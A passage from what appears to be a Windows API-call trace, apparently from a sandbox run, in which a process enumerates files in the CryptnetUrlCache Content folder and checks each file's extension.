cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0098.060] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0098.060] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.060] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0098.061] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0098.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.061] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58394060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58394060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0098.061] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0098.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.061] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0098.061] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0098.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.061] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0098.061] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0098.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.061] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0098.061] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0098.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.061] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0098.061] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0098.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.061] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0098.061] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0098.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.061] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x56e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0098.061] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0098.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.062] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0098.062] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0098.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.062] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0098.062] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0098.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.062] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0098.062] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0098.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.062] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbddd270, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0xd2da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0098.062] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned="" [0098.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.062] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0098.062] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0098.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.062] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0098.062] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0098.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.062] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0098.062] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0098.062] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.062] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0098.063] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0098.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.063] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54bc3730, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54bc3730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb11d4fc0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450", cAlternateFileName="A9E4F7~1")) returned 1 [0098.063] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\A9E4F776657345B52012CE8E279D314C_183A5BE0B233CC1D513955FABECF9450") returned="" [0098.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.063] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bfe570, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bfe570, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe9b34f0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cAlternateFileName="ACF244~1")) returned 1 [0098.063] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned="" [0098.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.063] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe04aaa10, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe04aaa10, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xae4e7080, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", cAlternateFileName="B3BB9C~2")) returned 1 [0098.063] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned="" [0098.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.063] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefc01b00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefc01b00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaa4ee1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", cAlternateFileName="B3BB9C~1")) returned 1 [0098.063] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned="" [0098.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.063] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54322770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54322770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cAlternateFileName="BC570E~2")) returned 1 [0098.063] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned="" [0098.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.063] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf019010, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", cAlternateFileName="BC570E~1")) returned 1 [0098.063] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned="" [0098.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.063] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x56bb3b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x56bb3b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaeca3800, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", cAlternateFileName="C46E7B~2")) returned 1 [0098.063] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0098.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.063] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0098.063] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0098.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.064] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0098.064] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0098.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.064] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0098.064] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0098.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: 